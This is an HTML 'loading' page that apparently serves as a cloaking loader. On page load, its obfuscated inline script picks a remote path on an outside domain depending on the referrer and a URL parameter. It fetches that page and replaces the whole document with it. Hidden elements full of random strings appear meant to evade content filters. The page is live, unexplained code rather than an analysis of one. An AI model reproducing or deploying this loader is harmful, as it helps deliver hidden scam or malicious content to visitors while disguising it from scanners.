<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .n6wSL0Xgwv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .n6wSL0Xgwv .yCjHMY8k {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .n6wSL0Xgwv .content {
            line-height: 50px;
            text-align: center
        }

        .n6wSL0Xgwv .img {
            width: 100%
        }

        .n6wSL0Xgwv .s8vPBR {
            text-align: center
        }

        .n6wSL0Xgwv .s8vPBR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .n6wSL0Xgwv .s8vPBR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .n6wSL0Xgwv .s8vPBR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .n6wSL0Xgwv .s8vPBR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .n6wSL0Xgwv .s8vPBR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .n6wSL0Xgwv .s8vPBR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .n6wSL0Xgwv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rBQ4lbPmbM(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FIYiK = rBQ4lbPmbM('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FIYiK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FIYiK +".html?a=share";
		}
		
        ahf0RE2ad=url+"#"+new Date().getTime();
        ahf0RE2ad && function() {
            $.get(ahf0RE2ad, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >qlgI6hI4dYIwCUAAQ6EkpqpY0AL2AmbCmSwakkuGuBmDTafb0cV4nuAD2OT6U3DZy0</h1>
<b style='display:none' >NQJCPliMfbKdYOczqf3qALeh</b>
<img  src='' style='display:none'>
<span style='display:none'>SXw1WzPnNedtpPZ7kCzYIZdzmWVGitAnhRqnQmN75visj8aownjGmV86Lg8Hj9ocpxx4F3JMNgVVSJ0ey1fnwhBssEwKjnVJnFrC</span><div class="n6wSL0Xgwv">
    <div class="yCjHMY8k">
        <div class="s8vPBR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >j0DBMk2ZuRX8MCUGDjy3V75C6HrBcrajDBkeNp32PCT4LYFNUBUur2oOcA96Jfe6UzUF5J8QZ</b>
<li style='display:none' >baINa4XFEDKDCjSLh0nk9pFeh9JQLkp1QhBwy2MFXAt7vG1btaleJi4Cio3WNeKGp4juVNfZM9xltmB1y598nnyAwXgRk</li>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>NtKQl5f1aqdKmKpnV89BjwLcKfo63CTZMJWpoH7X0epB3tGo8khkgg3RVgm40d3V</a>
<span style='display:none'>upYRamfut3c6MRRxwUrA4zy94maZEVrqj4qdqStPdEyyh1fkVDOqixV4xRzd7GArx</span>
<div style='display:none'>vyGvfyreNfnTjMEbLyBlfPztwp38RBosuouwdtT9Iliz4ijdqNfFjuhl5P6tA9IMIq</div>
<span style='display:none'>upYRamfut3c6MRRxwUrA4zy94maZEVrqj4qdqStPdEyyh1fkVDOqixV4xRzd7GArx</span>
<p  style='display:none'>QseIyPxUGlM70J</p></body>
</html>